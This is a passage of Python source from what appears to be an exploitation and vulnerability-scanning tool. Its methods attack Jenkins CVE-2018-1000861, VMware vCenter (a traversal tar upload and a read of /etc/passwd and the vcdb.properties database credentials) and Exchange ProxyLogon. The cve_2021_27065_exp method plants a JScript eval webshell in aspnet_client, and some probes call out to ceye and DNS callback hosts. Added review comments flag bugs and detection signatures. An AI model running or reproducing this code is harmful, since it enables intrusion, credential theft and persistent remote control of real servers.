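        self.c_cmd = self.c_base.decode('ascii')
        self.cmd = _encode(self.c_echo)
        self.payload = self.payload_cve_2018_1000861.replace("RECOMMAND", self.cmd)
        try:
            try:
                # Best-effort version banner; absent header or failed request
                # is not an error for the PoC itself.
                self.request = requests.get(self.url, headers=self.headers,
                                            timeout=self.timeout, verify=False)
                self.jenkins_version = self.request.headers['X-Jenkins']
                self.ver = " [version:" + self.jenkins_version + "]"
            except Exception:
                pass
            self.r = requests.get(self.url + self.payload, headers=self.headers,
                                  timeout=self.timeout, verify=False)
            self.request = requests.get(self.url + "/robots.txt", headers=self.headers,
                                        timeout=self.timeout, verify=False)
            if md in self.request.text:
                self.vul_info["vul_data"] = dump.dump_all(self.r).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[rce] [url: " + self.url + "/robots.txt ] "
            else:
                # Out-of-band fallback for targets that execute but where
                # robots.txt is not writable/served.
                self.c_echo = "ping " + md + "." + self.ceye_domain
                self.c_base = base64.b64encode(str.encode(self.c_echo))
                self.c_cmd = self.c_base.decode('ascii')
                self.cmd = _encode(self.c_echo)
                self.payload = self.payload_cve_2018_1000861.replace("RECOMMAND", self.cmd)
                self.req = requests.get(self.url + self.payload, headers=self.headers,
                                        timeout=self.timeout, verify=False)
                # Bug fix: the callback poll had no timeout; a stalled ceye API
                # hung this thread while it held threadLock.  TLS verification
                # stays on for the third-party callback service.
                ceye = requests.get(self.ceye_api + self.ceye_token, timeout=self.timeout)
                if md in ceye.text:
                    self.vul_info["vul_data"] = dump.dump_all(self.req).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["prt_info"] = "[ceye] [cmd: " + self.c_echo + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()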
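def cve_2021_21972_poc(self):
    """PoC for VMware vCenter CVE-2021-21972 (unauthenticated OVA upload → file write).

    A GET on `/ui/vropspluginui/rest/services/uploadova` answering 405 marks
    the endpoint as present ("PoC_MaYbE").  The PoC then uploads the
    pre-built `payload/payload/cve202121972_linux.tar` (and, if that leaves no
    trace, the `_windows.tar` variant) and checks whether
    `/ui/resources/vvvvvv.txt` now contains "upload" — presumably the marker
    file each tar drops via path traversal.  Results go through
    `verify.scan_print`; nothing is returned.

    Side effect on the target: the tar contents are written under the vCenter
    UI resources directory and are not cleaned up.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "Vmware vCenter: CVE-2021-21972"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Vmware vCenter 任意文件上传"
        self.vul_info["vul_numb"] = "CVE-2021-21972"
        self.vul_info["vul_apps"] = "Vmware"
        self.vul_info["vul_date"] = "2021-02-24"
        self.vul_info["vul_vers"] = "7.0 < 7.0 U1c, 6.7 < 6.7 U3l, 6.5 < 6.5 U3n"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "任意文件上传"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "未经授权的文件上传会导致远程执行代码(RCE)(CVE-2021-21972)"
        self.vul_info["cre_date"] = "2021-02-25"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = {
            "User-agent": self.ua,
            "Connection": "close",
            "Content-Type": "application/x-www-form-urlencoded",
        }

        def _try_tar(tar_path, upload_headers):
            # Upload one traversal tar and fetch the marker it should drop.
            # Returns (upload response, marker response, marker url).  The
            # file handle is closed on return (bug fix: it used to leak).
            upload_url = urljoin(self.url, "/ui/vropspluginui/rest/services/uploadova")
            with open(tar_path, 'rb') as fh:
                post_resp = requests.post(upload_url, files={'uploadFile': fh},
                                          headers=upload_headers,
                                          timeout=self.timeout, verify=False)
            marker_url = requests.compat.urljoin(self.url, "/ui/resources/vvvvvv.txt")
            get_resp = requests.get(marker_url, headers=upload_headers,
                                    timeout=self.timeout, verify=False)
            return post_resp, get_resp, marker_url

        try:
            url = urljoin(self.url, "/ui/vropspluginui/rest/services/uploadova")
            res = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
            if res.status_code == 405:
                self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoC_MaYbE"
                self.vul_info["vul_payd"] = url
                self.vul_info["prt_info"] = "[upload] [url:" + url + " ]"
                headers = {
                    "User-Agent": self.ua,
                    "Accept": "*/*",
                    "Connection": "close",
                }
                path = os.path.split(os.path.realpath(sys.argv[0]))[0]
                # Linux first; the Windows tar is only tried when Linux leaves no marker.
                for os_name, tar_file in (("linux", "cve202121972_linux.tar"),
                                          ("windows", "cve202121972_windows.tar")):
                    tar_path = path + "/payload/payload/" + tar_file
                    r, req, url = _try_tar(tar_path, headers)
                    if r"upload" in req.text:
                        self.vul_info["vul_data"] = dump.dump_all(r).decode('utf-8', 'ignore')
                        self.vul_info["prt_resu"] = "PoCSuCCeSS"
                        self.vul_info["vul_payd"] = tar_path
                        self.vul_info["prt_info"] = "[upload] [os:" + os_name + "] [url:" + url + " ]"
                        break
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()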
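def time_2020_1013_poc(self):
    """PoC for the VMware vCenter unauthenticated file read via `/eam/vib?id=` (no CVE).

    Requests `/etc/passwd` through the EAM endpoint and, if the Linux markers
    are absent, the Windows `vcdb.properties` (which holds the vCenter DB
    credentials).  A 200 containing the expected file content is reported as
    "PoCSuCCeSS".  Results go through `verify.scan_print`; nothing is returned.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "Vmware vCenter: time-2020-10-13 (not cve)"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Vmware vCenter 任意文件读取"
        self.vul_info["vul_numb"] = "time-2020-10-13"
        self.vul_info["vul_apps"] = "Vmware"
        self.vul_info["vul_date"] = "2020-10-13"
        self.vul_info["vul_vers"] = "<= 6.5u1"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "任意文件读取"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. VMware revealed that this vulnerability was patched in 6.5u1, but no CVE was assigned."
        self.vul_info["cre_date"] = "2021-02-26"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = {
            "User-agent": self.ua,
            "Connection": "close",
        }
        try:
            url = urljoin(self.url, "/eam/vib?id=/etc/passwd")
            res = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
            if res.status_code == 200 and r"root:/bin/bash" in res.text and r"root:x:0:0" in res.text:
                self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = url
                self.vul_info["prt_info"] = "[file] [os:linux] [url:" + url + " ]"
            else:
                # Bug fix: this path was a normal string, so "\vmware-vpx" and
                # "\vcdb" were sent with \v turned into a vertical-tab byte and
                # the Windows probe could never hit the real file.
                url = urljoin(
                    self.url,
                    r"/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties",
                )
                res = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
                # Bug fix: the original looked for "dirver", which no
                # properties file contains.  vcdb.properties is expected to
                # carry JDBC driver/username/password keys — confirm against a
                # real sample if this branch misbehaves.
                if (res.status_code == 200 and r"username" in res.text
                        and r"password" in res.text and r"driver" in res.text):
                    self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["vul_payd"] = url
                    self.vul_info["prt_info"] = "[file] [os:windows] [url:" + url + " ]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()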
def cve_2021_27065_poc(self) -> None:
    """PoC for Microsoft Exchange CVE-2021-27065 (ProxyLogon chain, pre-file-write).

    Every backend request is tunnelled through `/ecp/y.js` with a crafted
    `X-BEResource` cookie (the CVE-2021-26855 SSRF named in vul_desc).  The
    chain implemented here: NTLM type-2 challenge from `/rpc/` to learn the
    backend computer name, Autodiscover to get the LegacyDN of a guessed
    `administrator@<domain>` mailbox, `/mapi/emsmdb/` to turn that into a SID,
    `/ecp/proxyLogon.ecp` to mint an ECP session + canary for that SID, and
    `DDIService.svc/GetObject` to read the OAB virtual-directory identity.
    Having all five artefacts is reported as "PoCSuCCeSS".  The arbitrary
    file write itself is NOT performed by this method (see the `_exp`
    variant).  Results go through `verify.scan_print`; nothing is returned.

    NOTE(review): this "PoC" obtains a privileged ECP session on the target —
    that is exploitation, not a passive check.
    NOTE(review): `self.port` is overwritten below; other PoCs on the same
    instance (e.g. the Tomcat AJP check) read `self.port` afterwards.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-27065"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Microsoft Exchange Server Arbitrary File Write"
    self.vul_info["vul_numb"] = "CVE-2021-27065"
    self.vul_info["vul_apps"] = "Exchange"
    self.vul_info["vul_date"] = "2021-03-03"
    self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "Arbitrary File Write"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证," \
                                "同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF " \
                                "漏洞组合进行getshell。"
    self.vul_info["cre_date"] = "2021-03-12"
    self.vul_info["cre_auth"] = "zhzyker"

    def __unpack_str(byte_string: bytes) -> str:
        # NTLM AV_PAIR values are UTF-16LE; decoding as UTF-8 and dropping the
        # NULs only works for ASCII names (inherited behaviour).
        return byte_string.decode('UTF-8').replace('\x00', '')

    def __unpack_int(format: str, data: bytes) -> int:
        return unpack(format, data)[0]

    def __exploit(url, name, path, qs='', data='', cookies=[], headers={}):
        # SSRF primitive: POST to the frontend /ecp/y.js with an X-BEResource
        # cookie naming the backend host (`name`:444) and target `path`.
        # Returns the Response, or False on any requests error.
        cookies = list(cookies)
        cookies.extend([
            'X-BEResource=a]@%s:444%s?%s#~1941962753' % (name, path, qs),
        ])
        if not headers:
            headers = {'Content-Type': 'application/json'}
        headers['Cookie'] = ';'.join(cookies)
        headers['msExchLogonMailbox'] = 'S-1-5-20'
        try:
            # NOTE(review): no timeout here, unlike every other request.
            r = requests.post(url + "/ecp/y.js", headers=headers, data=data,
                              verify=False, allow_redirects=False)
            return r
        except:
            return False

    def _get_sid(url, name, mail):
        # Autodiscover (LegacyDN for `mail`) -> MAPI Connect (SID), both via
        # __exploit.  Returns the SID string or False.
        payload = '''
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>%s</EMailAddress>
<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
''' % mail
        headers = {
            'User-Agent': 'ExchangeServicesClient/0.0.0.0',
            'Content-Type': 'text/xml'
        }
        r = __exploit(url, name, '/autodiscover/autodiscover.xml', qs='', data=payload, headers=headers)
        res = re.search('<LegacyDN>(.*?)</LegacyDN>', r.text)
        if res:
            headers = {
                'X-Clientapplication': 'Outlook/15.0.4815.1002',
                'X-Requestid': 'x',
                'X-Requesttype': 'Connect',
                'Content-Type': 'application/mapi-http',
            }
            legacyDN = res.group(1)
            payload = legacyDN + '\x00\x00\x00\x00\x00\x20\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00'
            r = __exploit(url, name, '/mapi/emsmdb/', qs='', data=payload, headers=headers)
            # The MAPI error text leaks the SID of the mailbox owner.
            res = re.search('with SID ([S\-0-9]+) ', r.text)
            if res:
                return res.group(1)
            else:
                return False
        else:
            return False

    def _parse_challenge(auth):
        # Walk the TargetInfo AV_PAIR list of an NTLM CHALLENGE (type 2)
        # message; returns (dns_domain_name, dns_computer_name), '' if absent.
        target_info_field = auth[40:48]
        target_info_len = __unpack_int('H', target_info_field[0:2])
        target_info_offset = __unpack_int('I', target_info_field[4:8])
        target_info_bytes = auth[target_info_offset:target_info_offset + target_info_len]
        domain_name = ''
        computer_name = ''
        info_offset = 0
        while info_offset < len(target_info_bytes):
            av_id = __unpack_int('H', target_info_bytes[info_offset:info_offset + 2])
            av_len = __unpack_int('H', target_info_bytes[info_offset + 2:info_offset + 4])
            av_value = target_info_bytes[info_offset + 4:info_offset + 4 + av_len]
            info_offset = info_offset + 4 + av_len
            if av_id == 2:  # MsvAvDnsDomainName
                domain_name = __unpack_str(av_value)
            elif av_id == 3:  # MsvAvDnsComputerName
                computer_name = __unpack_str(av_value)
        return domain_name, computer_name

    def _get_email(url: str) -> str:
        # Registered domain of `url` (via tld.get_fld); "unkonw" if unparsable.
        try:
            url = get_fld(url)
            return url
        except:
            return "unkonw"

    try:
        self.getipport = urlparse(self.url)
        self.hostname = self.getipport.hostname
        self.port = self.getipport.port
        if self.port == None and r"https://" in self.url:
            self.port = 443
        elif self.port == None and r"http://" in self.url:
            self.port = 80
        # Mailbox to probe: administrator@<registered domain>.  When the URL
        # contains a digit (presumably meant as "looks like an IP"), the
        # domain is taken from the server certificate's SAN instead.
        if bool(re.search(r'\d', self.url)):
            try:
                from urllib3.contrib import pyopenssl as reqs
                x509 = reqs.OpenSSL.crypto.load_certificate(
                    reqs.OpenSSL.crypto.FILETYPE_PEM,
                    reqs.ssl.get_server_certificate((self.hostname, self.port)))
                # NOTE(review): [0] selects the first (type, value) SAN pair;
                # the loop then iterates its two fields, so the last iteration
                # wins — effectively the first SAN value.  Relies on urllib3
                # internals; confirm against the installed version.
                keys = reqs.get_subj_alt_name(x509)[0]
                for k in keys:
                    MAIL = "administrator@" + _get_email("https://" + k)
            except:
                MAIL = "administrator@" + _get_email(self.url)
        else:
            MAIL = "administrator@" + _get_email(self.url)
        # Getting ComputerName and DomainName from the NTLM type-2 challenge.
        url = self.url + "/rpc/"
        ntlm_type1 = "TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKALpHAAAADw=="
        headers = {'Authorization': 'Negotiate %s' % ntlm_type1}
        r = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
        # A missing WWW-Authenticate header raises KeyError -> error_print.
        auth_header = r.headers['WWW-Authenticate']
        auth = re.search('Negotiate ([A-Za-z0-9/+=]+)', auth_header).group(1)
        domain_name, computer_name = _parse_challenge(b64decode(auth))
        NAME = computer_name
        # get SID
        sid = _get_sid(self.url, NAME, MAIL)
        # proxyLogon: obtain an ECP session and CSRF canary for the SID.
        payload = '<r at="NTLM" ln="%s"><s t="0">%s</s></r>' % (MAIL.split('@')[0], sid)
        r = __exploit(self.url, NAME, '/ecp/proxyLogon.ecp', qs='', data=payload)
        session_id = r.cookies.get('ASP.NET_SessionId')
        canary = r.cookies.get('msExchEcpCanary')
        try:
            extra_cookies = [
                'ASP.NET_SessionId=' + session_id,
                'msExchEcpCanary=' + canary
            ]
        except:
            # One of them is None; keep going with "None" so the final
            # all-present check below fails cleanly.
            extra_cookies = [
                'ASP.NET_SessionId=' + str(session_id),
                'msExchEcpCanary=' + str(canary)
            ]
        # Getting OAB information
        qs = urlencode({
            'schema': 'OABVirtualDirectory',
            'msExchEcpCanary': canary
        })
        r = __exploit(self.url, NAME, '/ecp/DDI/DDIService.svc/GetObject', qs=qs, data='', cookies=extra_cookies)
        try:
            identity = r.json()['d']['Output'][0]['Identity']
        except:
            identity = False
        if NAME and sid and session_id and canary and identity:
            self.vul_info["vul_data"] = dump.dump_all(r).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = ntlm_type1
            self.vul_info["prt_info"] = "[file write] [email:" + MAIL + "] [sid:" + sid + "] [oab-id:" + identity['RawIdentity'] + "]"
            verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as error:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2021_27065_exp(self, cmd, file, email):
    """Exchange CVE-2021-27065 check: tries to reach the ECP OAB virtual-directory
    settings through the /ecp/y.js backend-resource proxy and reports the result.

    Args:
        cmd: kept for signature parity with the other *_exp methods; it is not
            referenced anywhere in this body.
        file: file name appended to the fixed aspnet_client directory (FILE_PATH).
        email: mailbox address used for the autodiscover/MAPI SID lookup.

    Returns nothing; every outcome goes through verify.*_print.
    NOTE(review): layout restored from a collapsed listing — the nesting of the
    final `up`/exploit_print statements relative to `if r.status_code == 200:`
    is inferred, confirm against the original file.
    """
    vul_name = "Microsoft Exchange: CVE-2021-27065"
    # Target path is hard-coded to the aspnet_client directory; only the file name varies.
    FILE_PATH = 'C:\\inetpub\\wwwroot\\aspnet_client\\' + file
    FILE_DATA = '<script language="JScript" runat="server">function Page_Load(){eval(Request["v"],"unsafe");}</script>'

    def __unpack_str(byte_string):
        # NTLM AV_PAIR values are UTF-16LE; this decodes as UTF-8 and drops the NULs instead.
        return byte_string.decode('UTF-8').replace('\x00', '')

    def __unpack_int(format, data):
        # `format` shadows the builtin; kept as-is because the name is local only.
        return unpack(format, data)[0]

    def __exploit(url, name, path, qs='', data='', cookies=[], headers={}):
        # Mutable defaults: safe only because `cookies` is copied and an empty
        # `headers` is replaced below; a caller-supplied headers dict IS mutated.
        cookies = list(cookies)
        # The X-BEResource cookie aimed at a backend path, POSTed to /ecp/y.js, is the
        # request shape that on-wire detection for this CVE family keys on.
        cookies.extend([
            'X-BEResource=a]@%s:444%s?%s#~1941962753' % (name, path, qs),
        ])
        if not headers:
            headers = {'Content-Type': 'application/json'}
        headers['Cookie'] = ';'.join(cookies)
        headers['msExchLogonMailbox'] = 'S-1-5-20'
        try:
            # No timeout is passed here, unlike the requests.get calls below.
            r = requests.post(url + "/ecp/y.js", headers=headers, data=data, verify=False, allow_redirects=False)
            return r
        except:
            # Returning False means callers that touch `r.text`/`r.cookies` raise
            # AttributeError, which the outer `except Exception` turns into error_print.
            return False

    def _get_sid(url, name, mail):
        # Returns the SID string on success, False on any miss.
        payload = ''' <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover> ''' % mail
        headers = {
            'User-Agent': 'ExchangeServicesClient/0.0.0.0',
            'Content-Type': 'text/xml'
        }
        r = __exploit(url, name, '/autodiscover/autodiscover.xml', qs='', data=payload, headers=headers)
        res = re.search('<LegacyDN>(.*?)</LegacyDN>', r.text)
        if res:
            headers = {
                'X-Clientapplication': 'Outlook/15.0.4815.1002',
                'X-Requestid': 'x',
                'X-Requesttype': 'Connect',
                'Content-Type': 'application/mapi-http',
            }
            legacyDN = res.group(1)
            payload = legacyDN + '\x00\x00\x00\x00\x00\x20\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00'
            r = __exploit(url, name, '/mapi/emsmdb/', qs='', data=payload, headers=headers)
            res = re.search('with SID ([S\-0-9]+) ', r.text)
            if res:
                return res.group(1)
            else:
                return False
        else:
            return False

    def _parse_challenge(auth):
        # Walks the TargetInfo AV_PAIR list of an NTLM Type 2 message and returns
        # (domain_name, computer_name); either is '' when its AV id is absent.
        target_info_field = auth[40:48]
        target_info_len = __unpack_int('H', target_info_field[0:2])
        target_info_offset = __unpack_int('I', target_info_field[4:8])
        target_info_bytes = auth[target_info_offset:target_info_offset + target_info_len]
        domain_name = ''
        computer_name = ''
        info_offset = 0
        while info_offset < len(target_info_bytes):
            av_id = __unpack_int('H', target_info_bytes[info_offset:info_offset + 2])
            av_len = __unpack_int('H', target_info_bytes[info_offset + 2:info_offset + 4])
            av_value = target_info_bytes[info_offset + 4:info_offset + 4 + av_len]
            info_offset = info_offset + 4 + av_len
            if av_id == 2:  # MsvAvDnsDomainName
                domain_name = __unpack_str(av_value)
            elif av_id == 3:  # MsvAvDnsComputerName
                computer_name = __unpack_str(av_value)
        return domain_name, computer_name

    def _get_email(url):
        # Not called in this method (the caller supplies `email` directly).
        try:
            url = get_fld(url)
            return url
        except:
            return "unkonw"

    try:
        MAIL = email
        print('[+] Test Email =', MAIL)
        # Getting ComputerName and DomainName
        url = self.url + "/rpc/"
        ntlm_type1 = "TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKALpHAAAADw=="
        headers = {'Authorization': 'Negotiate %s' % ntlm_type1}
        r = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
        # `assert` is stripped under -O; a non-401 then falls through to the regex
        # below, which raises AttributeError and is reported as a generic error.
        assert r.status_code == 401, "Error while getting ComputerName"
        auth_header = r.headers['WWW-Authenticate']
        auth = re.search('Negotiate ([A-Za-z0-9/+=]+)', auth_header).group(1)
        domain_name, computer_name = _parse_challenge(b64decode(auth))
        print('[*] Domain Name =', domain_name)
        print('[*] Computer Name =', computer_name)
        NAME = computer_name
        # get SID
        sid = _get_sid(self.url, NAME, MAIL)
        print('[*] Login sid =', sid)
        payload = '<r at="NTLM" ln="%s"><s t="0">%s</s></r>' % (MAIL.split('@')[0], sid)
        r = __exploit(self.url, NAME, '/ecp/proxyLogon.ecp', qs='', data=payload)
        session_id = r.cookies.get('ASP.NET_SessionId')
        canary = r.cookies.get('msExchEcpCanary')
        print('[*] get ASP.NET_SessionId =', session_id)
        print('[*] get msExchEcpCanary =', canary)
        try:
            extra_cookies = [
                'ASP.NET_SessionId=' + session_id,
                'msExchEcpCanary=' + canary
            ]
        except:
            # Reached when either cookie is None; the str() fallback sends the
            # literal text "None", so later requests carry an invalid session.
            extra_cookies = [
                'ASP.NET_SessionId=' + str(session_id),
                'msExchEcpCanary=' + str(canary)
            ]
        # Getting OAB information
        qs = urlencode({'schema': 'OABVirtualDirectory', 'msExchEcpCanary': canary})
        r = __exploit(self.url, NAME, '/ecp/DDI/DDIService.svc/GetObject', qs=qs, data='', cookies=extra_cookies)
        try:
            identity = r.json()['d']['Output'][0]['Identity']
            print('[*] OAB Name', identity['DisplayName'])
            print('[*] OAB ID ', identity['RawIdentity'])
        except:
            # identity=False is then indexed below (identity['DisplayName']), which
            # raises TypeError and ends the run via the outer error_print.
            identity = False
        print('[*] Setting up webshell payload through OAB')
        qs = urlencode({'schema': 'OABVirtualDirectory', 'msExchEcpCanary': canary})
        payload = json.dumps({
            'identity': {
                '__type': 'Identity:ECP',
                'DisplayName': identity['DisplayName'],
                'RawIdentity': identity['RawIdentity']
            },
            'properties': {
                'Parameters': {
                    '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
                    'ExternalUrl': 'http://f/' + FILE_DATA
                }
            }
        })
        r = __exploit(self.url, NAME, '/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)
        if r.status_code == 200:
            print('[*] Writing shell')
            qs = urlencode({'schema': 'ResetOABVirtualDirectory', 'msExchEcpCanary': canary})
            payload = json.dumps({
                'identity': {
                    '__type': 'Identity:ECP',
                    'DisplayName': identity['DisplayName'],
                    'RawIdentity': identity['RawIdentity']
                },
                'properties': {
                    'Parameters': {
                        '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
                        'FilePathName': FILE_PATH
                    }
                }
            })
            r = __exploit(self.url, NAME, '/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)
            # Set-OABVirtualDirectory
            print('[*] Cleaning OAB')
            qs = urlencode({'schema': 'OABVirtualDirectory', 'msExchEcpCanary': canary})
            payload = json.dumps({
                'identity': {
                    '__type': 'Identity:ECP',
                    'DisplayName': identity['DisplayName'],
                    'RawIdentity': identity['RawIdentity']
                },
                'properties': {
                    'Parameters': {
                        '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
                        'ExternalUrl': ''
                    }
                }
            })
            r = __exploit(self.url, NAME, '/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)
        # The "upload" message is printed from the last response alone; no read-back
        # of the written path confirms it, so treat the output as unverified.
        up = '[+] upload webshell is ' + self.url + "/aspnet_client/" + file
        self.raw_data = dump.dump_all(r).decode('utf-8', 'ignore')
        verify.exploit_print(up, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
def cve_2021_26855_poc(self):
    """Exchange CVE-2021-26855 (SSRF) probe.

    First sends the backend-resource cookies pointing at a DNS callback name and
    treats a resolved lookup as PoCSuCCeSS; otherwise re-sends them pointing at
    `localhost` and reports PoC_MaYbE when the 500 error page mentions a failed
    NegotiateSecurityContext for that host.  Result is printed via verify.scan_print.
    NOTE(review): vul_desc below describes the CVE-2021-27065 file-write bug, not
    this SSRF — looks copy-pasted; confirm and correct the metadata.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-26855"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Microsoft Exchange Server SSRF"
    self.vul_info["vul_numb"] = "CVE-2021-26855"
    self.vul_info["vul_apps"] = "Exchange"
    self.vul_info["vul_date"] = "2021-03-03"
    self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "SSRF"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证,同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF 漏洞或通过破坏合法管理员的凭据来进行身份验证。"
    self.vul_info["cre_date"] = "2021-03-07"
    self.vul_info["cre_auth"] = "zhzyker"
    url = self.url + "/owa/auth/x.js"
    dns = dns_request()
    # The X-AnonResource-Backend / X-BEResource cookie pair on a static OWA path is
    # the request signature defenders can alert on for this CVE.
    cookie_local = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;"
    cookie_dns = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;".replace("localhost", dns)
    try:
        headers = {"User-agent": self.ua, "Cookie": cookie_dns, "Connection": "close"}
        res = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
        # Out-of-band confirmation: the server itself resolved the callback name.
        if dns_result(dns):
            self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = headers["Cookie"]
            self.vul_info["prt_info"] = "[ssrf] [dns] [cookie: " + headers["Cookie"] + "]"
        else:
            # In-band fallback: error-page fingerprint only, hence PoC_MaYbE.
            headers = {"User-agent": self.ua, "Cookie": cookie_local, "Connection": "close"}
            res = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
            if res.status_code == 500 and "NegotiateSecurityContext failed with for host" in res.text:
                if r"TargetUnknown" in res.text and r"localhost" in res.text:
                    self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoC_MaYbE"
                    self.vul_info["vul_payd"] = headers["Cookie"]
                    self.vul_info["prt_info"] = "[ssrf] [maybe] [cookie: " + headers["Cookie"] + "]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as error:
        verify.error_print(self.vul_info["prt_name"])
    # Released outside a finally: an exception raised inside a verify.*_print
    # call would leave the lock held for every other probe.
    self.threadLock.release()
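def time_2021_0318_poc(self):
    """Apache Solr arbitrary-file-read probe (tracked here as time-2021-03-18).

    Enables remote streaming on the first core via the /config API and then asks
    /debug/dump to fetch a local file through `stream.url`; the response is
    fingerprinted against /etc/passwd and, failing that, C:\\windows\\win.ini.
    Result is printed via verify.scan_print.

    Changes from the original: the `Connection: colse` header typo is corrected
    to `close`, the bare `except` around the core lookup is narrowed to
    `Exception`, and the thread lock is released in a `finally` so a failing
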